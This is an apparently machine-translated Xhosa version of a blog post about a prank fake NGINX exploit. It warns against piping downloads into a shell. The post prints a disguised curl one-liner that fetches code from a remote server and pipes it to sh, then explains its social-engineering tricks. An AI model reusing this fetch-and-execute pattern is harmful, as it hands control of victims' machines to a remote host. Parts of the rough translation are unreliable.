Phawula. transl.:
TL; DR: Musa ukusebenzisa umbhobho wefayile kwi-sh okanye kwi-bash phantsi kwayo nayiphi na imeko. Le yindlela entle yokuphulukana nolawulo lwekhompyuter yakho.
Ndifuna ukwabelana nawe ngebali elifutshane malunga nokuxhaphaza kwe-PoC ehlekisayo eyenziwe nge-31 kaMeyi. Wavela ngoko nangoko ephendula iindaba ezivela
Ukugqiba kwam ukusebenza kubuchule obutsha be-obfuscation kwi-curl, ndacaphula i-tweet yokuqala kwaye "ndivuza i-PoC esebenzayo" ebandakanya umgca omnye wekhowudi ekucingelwa ukuba ixhaphaza ubungozi obufunyenweyo. Kakade ke, oku yayibubudenge obupheleleyo. Ndicinge ukuba ndiza kubhengezwa kwangoko, kwaye kungcono ndifumane iiretweets ezimbalwa (oh kulungile).
Noko ke, andizange ndiyicinge into eyenzekayo emva koko. Ukuthandwa kwetweet yam kuye kwanda. Okumangalisa kukuba, okwangoku (15:00 ixesha laseMoscow ngoJuni 1) abantu abambalwa baye baqaphela ukuba oku kuyinkohliso. Abantu abaninzi bayayiphinda ngaphandle kokuyijonga kwaphela (singasathethi ke ngokuncoma imizobo ethandekayo ye-ASCII eyivelisayo).
Jonga nje indlela entle ngayo!
Ngelixa zonke ezi loops kunye nemibala mihle, kucacile ukuba abantu bekufuneka baqhube ikhowudi kumatshini wabo ukuze bazibone. Ngethamsanqa, izikhangeli zisebenza ngendlela efanayo, kwaye zidityaniswe nenyaniso yokuba andizange ndifune ukungena engxakini yomthetho, ikhowudi engcwatywe kwindawo yam yayisenza iifowuni ze-echo ngaphandle kokuzama ukufaka okanye ukwenza nayiphi na ikhowudi eyongezelelweyo.
Ukuhamba kancinci:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Ubunjineli be-Socio-electronic (SEE) - ngaphezu kokukhwabanisa
Ukhuseleko kunye nokuqhelana yayiyinxalenye enkulu yolu vavanyo. Ndicinga ukuba zizo ezikhokelele kwimpumelelo yakhe. Umgca womyalelo ubonisa ngokucacileyo ukhuseleko ngokubhekisa kwi-"127.0.0.1" (i-localhost eyaziwayo). I-Localhost ithathwa njengekhuselekile kwaye idatha ekuyo ayishiyi ikhompyuter yakho.
Ukuqhelana kwakusisitshixo sesibini KHANGELA icandelo lovavanyo. Ekubeni abaphulaphuli ekujoliswe kubo ngokuyinhloko baqulethwe ngabantu abaqhelana neziseko zokhuseleko lwekhompyutheni, kwakubalulekile ukwenza ikhowudi ukuze iinxalenye zayo zibonakale ziqhelekile kwaye ziqhelekile (kwaye ngoko zikhuselekile). Izinto ezibolekayo zeekhonsepthi zakudala zokuxhaphaza kunye nokuzidibanisa ngendlela engaqhelekanga kungqineke kuyimpumelelo enkulu.
Ngezantsi uhlalutyo olucacileyo lwe-line-liner. Yonke into ekolu luhlu iyanxiba indalo yezithambiso, kwaye akukho nto ifunekayo ekusebenzeni kwayo.
Ngawaphi amacandelo ayimfuneko ngokwenene? Oku -gsS
, -O 0x0238f06a
, |sh
kunye neseva yewebhu ngokwayo. Umncedisi we web akaqulathanga miyalelo engalunganga, kodwa unike ngokulula imizobo ye ASCII usebenzisa imiyalelo echo
kwiskripthi esiqulethwe kuyo index.html
. Xa umsebenzisi efake umgca nge |sh
esiphakathini, index.html
ilayishiwe kwaye yenziwe. Ngethamsanqa, abagcini bomncedisi wewebhu babengenanjongo zimbi.
-
../../../%00
β imele ukuya ngaphaya koluhlu; -
ngx_stream_module.so
- indlela eya kwimodyuli ye-NGINX engahleliwe; -
/bin/sh%00<'protocol:TCP'
-kucingelwa ukuba siyaqalisa/bin/sh
kumatshini ekujoliswe kuwo kwaye uqondise kwakhona imveliso kwitshaneli ye-TCP; -
-O 0x0238f06a#PLToffset
- isithako esiyimfihlo, esongezelelweyo#PLToffset
, ukujongeka njengesixhobo sokucima inkumbulo ngandlela ithile equlethwe kwi PLT; -
|sh;
- enye iqhekeza elibalulekileyo. Besidinga ukuqondisa kwakhona imveliso kwi sh/bash ukuze siphumeze ikhowudi evela kumncedisi wewebhu ohlaselayo obekwe kwa0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- idummy apho inetcat ibhekisa kuyo/dev/tcp/localhost
ukuze yonke into ibonakale ikhuselekile kwakhona. Enyanisweni, ayenzi nto kwaye ifakwe kumgca wobuhle.
Oku kuqukumbela ukucazululwa komgca omnye wescript kunye nengxoxo yemiba "yobunjineli bezentlalo-elektroniki" (iphishing entsonkothileyo).
Uqwalaselo lweSeva yeWebhu kunye nemilinganiselo yokuBilisa
Ekubeni uninzi lwababhalisi bam be-infosec / hackers, ndaye ndagqiba ekubeni ndenze iseva yewebhu ixhathise ngakumbi kwiinkcazo "zomdla" kwicala labo, ukuze abafana babe nento yokwenza (kwaye kuya kuba mnandi Misela). Andizukudwelisa yonke imigibe apha kuba uvavanyo lusaqhubeka, kodwa nazi izinto ezimbalwa ezenziwa ngumncedisi:
- Ijonga ngenkuthalo iinzame zokusasaza kwiinethiwekhi zentlalo ezithile kwaye ithathela indawo izithonjana ezahlukeneyo zokujonga kwangaphambili ukukhuthaza umsebenzisi ukuba acofe kwikhonkco.
- Ikwalathisa iChrome/Mozilla/Safari/njl kwividiyo yentengiso yeThugcrowd endaweni yokubonisa umbhalo weqokobhe.
- Iiwotshi zeempawu EZIQHELEKILEYO zokungena/ukugqekeza ngokuphandle, kwaye emva koko iqalise ukuthumela izicelo kwiiseva ze-NSA (ha!).
- Ifakela iTrojan, kunye ne-rootkit ye-BIOS, kuzo zonke iikhomputha abasebenzisi abatyelela umkhosi ukusuka kwisikhangeli esiqhelekileyo (ukudlala nje!).
Inxalenye encinci ye-antimers
Kule meko, injongo yam kuphela yayikukwazi ezinye zeempawu ze-Apache - ngokukodwa, imithetho epholileyo yokubuyisela izicelo - kwaye ndacinga: kutheni kungenjalo?
I-NGINX Exploit (Inyani!)
Rhuma kwi
umthombo: www.habr.com